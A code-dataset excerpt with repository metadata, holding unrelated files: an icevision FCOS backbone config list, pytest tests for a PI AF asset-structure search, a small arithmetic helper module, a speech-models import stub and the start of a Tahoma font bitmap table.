    "resnet50_caffe_fpn_gn_head_center_normbbox_centeronreg_giou",
    "resnet50_caffe_fpn_gn_head_dcn_1x_center_normbbox_centeronreg_giou",
    "resnet101_caffe_fpn_gn_head_1x_coco",
    "resnet50_caffe_fpn_gn_head_mstrain_640_800_2x",
    "resnet101_caffe_fpn_gn_head_mstrain_640_800_2x",
    "resnext101_64x4d_fpn_gn_head_mstrain_640_800_2x",
]

from icevision.imports import *
from icevision.models.mmdet.utils import *


class MMDetFCOSBackboneConfig(MMDetBackboneConfig):
    def __init__(self, **kwargs):
        super().__init__(model_name="fcos", **kwargs)


base_config_path = mmdet_configs_path / "fcos"
base_weights_url = (
    "https://openmmlab.oss-cn-hangzhou.aliyuncs.com/mmdetection/v2.0/fcos"
)

resnet50_caffe_fpn_gn_head = MMDetFCOSBackboneConfig(
    config_path=base_config_path / "fcos_r50_caffe_fpn_gn-head_1x_coco.py",
    weights_url=f"{base_weights_url}/fcos_r50_caffe_fpn_gn-head_1x_coco/fcos_r50_caffe_fpn_gn-head_1x_coco-821213aa.pth",
)

resnet50_caffe_fpn_gn_head_center_normbbox_centeronreg_giou = MMDetFCOSBackboneConfig(
    config_path=base_config_path
    / "fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco.py",
    weights_url=f"{base_weights_url}/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_1x_coco-0a0d75a8.pth",
)

resnet50_caffe_fpn_gn_head_dcn_1x_center_normbbox_centeronreg_giou = MMDetFCOSBackboneConfig(
    config_path=base_config_path
    / "fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco.py",
    weights_url=f"{base_weights_url}/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco/fcos_center-normbbox-centeronreg-giou_r50_caffe_fpn_gn-head_dcn_1x_coco-ae4d8b3d.pth",
)

resnet101_caffe_fpn_gn_head_1x_coco = MMDetFCOSBackboneConfig(
    config_path=base_config_path / "fcos_r101_caffe_fpn_gn-head_1x_coco.py",
    weights_url=f"{base_weights_url}/fcos_r101_caffe_fpn_gn-head_1x_coco/fcos_r101_caffe_fpn_gn-head_1x_coco-0e37b982.pth",
)

resnet50_caffe_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
    config_path=base_config_path
    / "fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco.py",
    weights_url=f"{base_weights_url}/fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco/fcos_r50_caffe_fpn_gn-head_mstrain_640-800_2x_coco-d92ceeea.pth",
)

resnet101_caffe_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
    config_path=base_config_path
    / "fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco.py",
    weights_url=f"{base_weights_url}/fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco/fcos_r101_caffe_fpn_gn-head_mstrain_640-800_2x_coco-511424d6.pth",
)

resnext101_64x4d_fpn_gn_head_mstrain_640_800_2x = MMDetFCOSBackboneConfig(
    config_path=base_config_path
    / "fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco.py",
    weights_url=f"{base_weights_url}/fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco/fcos_x101_64x4d_fpn_gn-head_mstrain_640-800_2x_coco-ede514a8.pth",
)
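Every entry above follows the same two-part pattern: a thin `MMDetBackboneConfig` subclass that pins `model_name` to `"fcos"`, plus one instance per backbone pairing an mmdet config file with its pretrained-checkpoint URL. A self-contained sketch of that pattern (stand-in base class and placeholder paths, not the real icevision types):

```python
from pathlib import Path

class BackboneConfig:
    """Stand-in for icevision's MMDetBackboneConfig: records the model
    name, the mmdet config path, and the pretrained-weights URL."""
    def __init__(self, model_name, config_path=None, weights_url=None):
        self.model_name = model_name
        self.config_path = config_path
        self.weights_url = weights_url

class FCOSBackboneConfig(BackboneConfig):
    def __init__(self, **kwargs):
        # Pin the model name, exactly as MMDetFCOSBackboneConfig does.
        super().__init__(model_name="fcos", **kwargs)

base_config_path = Path("configs") / "fcos"  # placeholder location
resnet50 = FCOSBackboneConfig(
    config_path=base_config_path / "fcos_r50_caffe_fpn_gn-head_1x_coco.py",
)
```

The subclass exists purely so callers never have to repeat the model name when declaring the many backbone variants.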
| 47.953125 | 195 | 0.844901 | 490 | 3,069 | 4.642857 | 0.136735 | 0.076923 | 0.138462 | 0.184615 | 0.858462 | 0.839121 | 0.832527 | 0.807033 | 0.777582 | 0.681319 | 0 | 0.089982 | 0.072988 | 3,069 | 63 | 196 | 48.714286 | 0.709666 | 0 | 0 | 0.098039 | 0 | 0.058824 | 0.563376 | 0.538612 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.039216 | 0 | 0.078431 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0f4c2e8c555f04a497e321e54db3874cd56ef34d | 51 | py | Python | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 54 | 2019-06-24T13:00:30.000Z | 2022-02-04T14:02:48.000Z | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 140 | 2019-06-12T08:33:08.000Z | 2022-03-07T17:21:56.000Z | tests/fixtures/py-source/filemoduleone.py | kevin2000141/dockta | e224794ea3735f7400a191b5b02ea7522d6dbf25 | [
"Apache-2.0"
] | 8 | 2019-11-24T18:53:53.000Z | 2021-03-14T23:17:22.000Z | def function_one():
    return "I am function one"
| 17 | 30 | 0.686275 | 8 | 51 | 4.25 | 0.75 | 0.647059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215686 | 51 | 2 | 31 | 25.5 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
0f58e834eb8c3186c33f4cbfb6f083b46acc9c6d | 18,207 | py | Python | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | assets/tests/piaf/test_af_structure_browser.py | 47lining/quickstart-osisoft-pisystem2aws-connector | f6bdcb84b3cb271d3498d057474be6833f67b5be | [
"Apache-2.0"
] | null | null | null | from utils.piaf.af_structure_browser import AfStructureBrowser
TEST_STRUCTURE = [
    {
        "name": "NuGreen",
        "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
        "attributes": [
            {
                "name": "test"
            }
        ],
        "assets": [
            {
                "name": "Little Rock",
                "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
                "attributes": [
                    {
                        "name": "test"
                    }
                ],
                "assets": [
                    {
                        "name": "Extruding Process",
                        "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
                        "description": "Current percent savings in energy use.",
                        "assets": [],
                        "attributes": [
                            {
                                "name": "test"
                            }
                        ],
                    }
                ]
            },
            {
                "name": "Second Extruding Process",
                "description": "Description 2",
                "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
                "template": "Boiler",
                "attributes": [
                    {
                        "name": "test"
                    }
                ],
            }
        ]
    }
]
def test_search_assets_by_name():
    #given
    browser = AfStructureBrowser(
        assets_query="Extruding Process"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_name_wildcards():
    #given
    browser = AfStructureBrowser(
        assets_query="Extruding.*"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_path():
    #given
    browser = AfStructureBrowser(
        assets_query=".*Little Rock\\Extruding Process.*",
        assets_field="path"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "description": "Current percent savings in energy use.",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_name_multiple():
    #given
    browser = AfStructureBrowser(
        assets_query=".*Extruding Process"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
            "name": "Second Extruding Process",
            "description": "Description 2",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
            "template": "Boiler",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_description():
    #given
    browser = AfStructureBrowser(
        assets_query="Current.*",
        assets_field="description"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual
def test_search_assets_by_template():
    #given
    browser = AfStructureBrowser(
        assets_query="Boiler",
        assets_field="template"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
            "name": "Second Extruding Process",
            "description": "Description 2",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
            "template": "Boiler",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_name_all():
    #given
    browser = AfStructureBrowser(
        assets_query=".*"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
            "name": "NuGreen",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
            "name": "Little Rock",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
            "name": "Second Extruding Process",
            "description": "Description 2",
            "template": "Boiler",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual


def test_search_assets_by_description_all():
    #given
    browser = AfStructureBrowser(
        assets_query=".*",
        assets_field="description"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
            "name": "NuGreen",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
            "name": "Little Rock",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "description": "Current percent savings in energy use.",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
            "name": "Second Extruding Process",
            "description": "Description 2",
            "template": "Boiler",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
            "attributes": [
                {
                    "name": "test"
                }
            ]
        }
    }
    assert expected == actual
TEST_STRUCTURE_WITH_ATTRIBUTES = [
    {
        "name": "NuGreen",
        "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
        "attributes": [
            {
                "name": "Fuel",
                "description": "Fuel description"
            },
            {
                "name": "Fuel2",
                "description": "Fuel description 2"
            }
        ],
        "assets": [
            {
                "name": "Little Rock",
                "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
                "description": "Current ...",
                "attributes": [
                    {
                        "name": "Water Savings",
                        "categories": [
                            {
                                "name": "Energy Savings KPI",
                                "description": "Relative energy use per ton of process feed."
                            }
                        ],
                        "description": "Current percent savings in energy use.",
                        "value": "",
                        "type": "System.Double",
                        "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
                        "point": {
                            "name": "SINUSOIDU_1",
                            "id": "10837",
                            "path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
                        }
                    }
                ],
                "assets": [
                    {
                        "name": "Extruding Process",
                        "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
                        "description": "Current percent savings in energy use.",
                        "attributes": [
                            {
                                "name": "test savings test",
                                "categories": [
                                    {
                                        "name": "test category"
                                    }
                                ]
                            }
                        ],
                    }
                ]
            },
            {
                "name": "Second Extruding Process",
                "description": "Description 2",
                "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
                "attributes": [
                    {
                        "name": "Fuel",
                        "description": "Fuel description second 2"
                    }
                ]
            }
        ]
    }
]
def test_select_attributes_by_name():
    # given
    browser = AfStructureBrowser(
        assets_query="NuGreen",
        assets_field="name",
        attributes_query="Fuel"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
            "name": "NuGreen",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
            "attributes": [
                {
                    "name": "Fuel",
                    "description": "Fuel description"
                }
            ]
        }
    }
    assert expected == actual


def test_select_attributes_by_name_wildcard():
    # given
    browser = AfStructureBrowser(
        assets_query="Current.*",
        assets_field="description",
        attributes_query=".*avings.*"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
            "name": "Little Rock",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
            "description": "Current ...",
            "attributes": [
                {
                    "name": "Water Savings",
                    "categories": [
                        {
                            "name": "Energy Savings KPI",
                            "description": "Relative energy use per ton of process feed."
                        }
                    ],
                    "description": "Current percent savings in energy use.",
                    "value": "",
                    "type": "System.Double",
                    "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
                    "point": {
                        "name": "SINUSOIDU_1",
                        "id": "10837",
                        "path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
                    }
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process": {
            "name": "Extruding Process",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process",
            "description": "Current percent savings in energy use.",
            "attributes": [
                {
                    "name": "test savings test",
                    "categories": [
                        {
                            "name": "test category"
                        }
                    ]
                }
            ]
        }
    }
    assert expected == actual


def test_select_attributes_by_description():
    # given
    browser = AfStructureBrowser(
        assets_query="NuGreen|Second Extruding Process",
        assets_field="name",
        attributes_query=".*2.*",
        attributes_field="description"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen": {
            "name": "NuGreen",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen",
            "attributes": [
                {
                    "name": "Fuel2",
                    "description": "Fuel description 2"
                }
            ]
        },
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process": {
            "name": "Second Extruding Process",
            "description": "Description 2",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Second Extruding Process",
            "attributes": [
                {
                    "name": "Fuel",
                    "description": "Fuel description second 2"
                }
            ]
        }
    }
    assert expected == actual


def test_select_attributes_by_category():
    # given
    browser = AfStructureBrowser(
        assets_query="Little Rock|NuGreen",
        assets_field="name",
        attributes_query="Energy Savings KPI",
        attributes_field="categories"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
    # then
    assert actual is not None
    expected = {
        "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock": {
            "name": "Little Rock",
            "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock",
            "description": "Current ...",
            "attributes": [
                {
                    "name": "Water Savings",
                    "categories": [
                        {
                            "name": "Energy Savings KPI",
                            "description": "Relative energy use per ton of process feed."
                        }
                    ],
                    "description": "Current percent savings in energy use.",
                    "value": "",
                    "type": "System.Double",
                    "path": "\\\\EC2AMAZ-0EE3VGR\\NuGreen\\NuGreen\\Little Rock\\Extruding Process\\Equipment\\B-045|Water Savings",
                    "point": {
                        "name": "SINUSOIDU_1",
                        "id": "10837",
                        "path": "\\\\EC2AMAZ-0EE3VGR\\SINUSOIDU_1"
                    }
                }
            ]
        }
    }
    assert expected == actual


def test_select_no_attributes():
    # given
    browser = AfStructureBrowser(
        assets_query=".*",
        assets_field="name",
        attributes_query="no attributes with this name",
        attributes_field="name"
    )
    # when
    actual = browser.search_assets(TEST_STRUCTURE_WITH_ATTRIBUTES)
    # then
    assert actual is not None
    expected = {}
    assert expected == actual
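The tests above pin down the `AfStructureBrowser` contract: walk the nested `assets` tree, keep every asset whose chosen field fully matches the regex, strip its `assets` key, filter its attributes (by name, description, or category name), and drop assets left with no matching attribute. A hypothetical re-implementation consistent with these tests (not the actual `utils.piaf` module):

```python
import re

def search_assets(structure, assets_query, assets_field="name",
                  attributes_query=".*", attributes_field="name"):
    """Return {path: asset} for every asset whose `assets_field` fully
    matches `assets_query`, keeping only matching attributes."""
    asset_re = re.compile(assets_query)
    attr_re = re.compile(attributes_query)

    def attr_matches(attr):
        if attributes_field == "categories":
            # Category queries match against the category names.
            return any(attr_re.fullmatch(cat.get("name", ""))
                       for cat in attr.get("categories", []))
        return attr_re.fullmatch(attr.get(attributes_field, "")) is not None

    results = {}

    def visit(asset):
        if asset_re.fullmatch(asset.get(assets_field, "")):
            # Keep the asset's own fields but drop its children.
            entry = {k: v for k, v in asset.items() if k != "assets"}
            entry["attributes"] = [a for a in asset.get("attributes", [])
                                   if attr_matches(a)]
            if entry["attributes"]:
                results[asset["path"]] = entry
        for child in asset.get("assets", []):
            visit(child)

    for root in structure:
        visit(root)
    return results
```

Note that `get(assets_field, "")` makes a missing field match `.*`, which is why assets without a `description` still appear in `test_search_assets_by_description_all`.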
| 30.703204 | 136 | 0.451749 | 1,304 | 18,207 | 6.204755 | 0.059049 | 0.096898 | 0.13756 | 0.183414 | 0.951304 | 0.94018 | 0.900012 | 0.862934 | 0.846249 | 0.829687 | 0 | 0.020085 | 0.420278 | 18,207 | 592 | 137 | 30.755068 | 0.746471 | 0.010985 | 0 | 0.591549 | 0 | 0.006036 | 0.361253 | 0.138802 | 0 | 0 | 0 | 0 | 0.052314 | 1 | 0.026157 | false | 0 | 0.002012 | 0 | 0.028169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f5bbd1dc453fccd676f7c44dcb13e61e629c947 | 121 | py | Python | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | null | null | null | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | null | null | null | speech/models/__init__.py | AlexZ0729/speech | 6ac4dbff6340c739a68a3fda0f851fd9850dd678 | [
"Apache-2.0"
] | 1 | 2020-06-08T02:17:10.000Z | 2020-06-08T02:17:10.000Z |
from speech.models.model import Model
from speech.models.seq2seq import Seq2Seq
from speech.models.ctc_model import CTC
| 24.2 | 41 | 0.842975 | 19 | 121 | 5.315789 | 0.368421 | 0.29703 | 0.475248 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.107438 | 121 | 4 | 42 | 30.25 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f6afece3d6e27e0f2462c6831ed9aff65de36f9 | 2,921 | py | Python | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null | py_everything/maths.py | fossabot/py_everything | 5924505e4d12d524df06ecffbfefa19f55499375 | [
"MIT"
] | null | null | null |
def add(num1, num2, *args):
    sum = num1 + num2
    for num in args:
        sum += num
    return sum


def subtract(num1, num2, *args):
    sub = num1 - num2
    for num in args:
        sub -= num
    return sub


def multiply(num1, *args):
    product = num1
    for num in args:
        product = product * num
    return product


def divide(num1, num2, type):
    # 'int' selects floor division, anything else true division.
    if type.lower() == 'int':
        int_quotient = num1 // num2
        return int_quotient
    else:
        float_quotient = num1 / num2
        return float_quotient


def float_div(num1, num2):
    quotient = num1 / num2
    return quotient


def int_div(num1, num2):
    quotient = num1 // num2
    return quotient


def expo(num1, num2):
    # ** is exponentiation; ^ would be bitwise XOR.
    expo = num1 ** num2
    return expo


def mod(num1, num2):
    remain = num1 % num2
    return remain


def eval_exp(exp):
    # Note: eval() executes arbitrary code; only use on trusted input.
    solution = eval(exp)
    return solution


def avg(listOfNos):
    avg = 0
    for num in listOfNos:
        avg += num
    avg = avg / len(listOfNos)
    return avg


class MathsBase:
    def __init__(self, num1=0, num2=0):
        self.num1 = num1
        self.num2 = num2

    def add(self, num1, num2, *args):
        sum = num1 + num2
        for num in args:
            sum += num
        return sum

    def subtract(self, num1, num2, *args):
        sub = num1 - num2
        for num in args:
            sub = sub - num
        return sub

    def multiply(self, num1, *args):
        product = num1
        for num in args:
            product = product * num
        return product

    def divide(self, num1, num2):
        quotient = num1 / num2
        return quotient


class MathsAdvanced:
    def __init__(self, num1=0, num2=0):
        self.num1 = num1
        self.num2 = num2

    def add(self, num1, num2, *args):
        sum = num1 + num2
        for num in args:
            sum += num
        return sum

    def subtract(self, num1, num2, *args):
        sub = num1 - num2
        for num in args:
            sub = sub - num
        return sub

    def multiply(self, num1, *args):
        product = num1
        for num in args:
            product = product * num
        return product

    def divide(self, num1, num2, type):
        # 'int' selects floor division, anything else true division.
        if type.lower() == 'int':
            int_quotient = num1 // num2
            return int_quotient
        else:
            float_quotient = num1 / num2
            return float_quotient

    def float_div(self, num1, num2):
        quotient = num1 / num2
        return quotient

    def int_div(self, num1, num2):
        quotient = num1 // num2
        return quotient

    def expo(self, num1, num2):
        # ** is exponentiation; ^ would be bitwise XOR.
        expo = num1 ** num2
        return expo

    def mod(self, num1, num2):
        remain = num1 % num2
        return remain

    def eval_exp(self, exp):
        # Note: eval() executes arbitrary code; only use on trusted input.
        solution = eval(exp)
        return solution

    def avg(self, listOfNos):
        avg = 0
        for num in listOfNos:
            avg += num
        avg = avg / len(listOfNos)
        return avg
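A note on the operators this module relies on: in Python `/` is true (float) division, `//` is floor division, `**` is exponentiation, and `^` is bitwise XOR — confusing the last two is a classic bug in small math helpers like these. A quick self-contained check:

```python
# True division always yields a float.
float_quotient = 7 / 2       # 3.5
# Floor division rounds toward negative infinity.
int_quotient = 7 // 2        # 3
# ** is exponentiation...
power = 2 ** 3               # 8
# ...while ^ is bitwise XOR, something else entirely.
xor = 2 ^ 3                  # 1
```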
| 19.473333 | 42 | 0.540568 | 366 | 2,921 | 4.254098 | 0.103825 | 0.184971 | 0.116891 | 0.069364 | 0.965318 | 0.965318 | 0.950546 | 0.950546 | 0.882466 | 0.804753 | 0 | 0.052231 | 0.370763 | 2,921 | 149 | 43 | 19.604027 | 0.794886 | 0 | 0 | 0.807339 | 0 | 0 | 0.002055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238532 | false | 0 | 0 | 0 | 0.46789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7e5426b4c2ca291b9940e20ba981ace416055eb1 | 58,162 | py | Python | gaugette/fonts/tahoma_16.py | wsiffer/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | 6 | 2020-07-30T00:21:29.000Z | 2022-03-16T23:31:09.000Z | gaugette/fonts/tahoma_16.py | antndeb/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | null | null | null | gaugette/fonts/tahoma_16.py | antndeb/Google-Bartender | 37018d3efe33a84074a6dccbce9e82f20ef3c923 | [
"MIT"
] | 1 | 2022-03-16T23:39:29.000Z | 2022-03-16T23:39:29.000Z | # coding=utf-8
# Module tahoma_16
# generated from Tahoma 12pt
name = "Tahoma 16"
start_char = '!'
end_char = chr(127)
char_height = 16
space_width = 8
gap_width = 2
bitmaps = (
# @0 '!' (1 pixels wide)
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
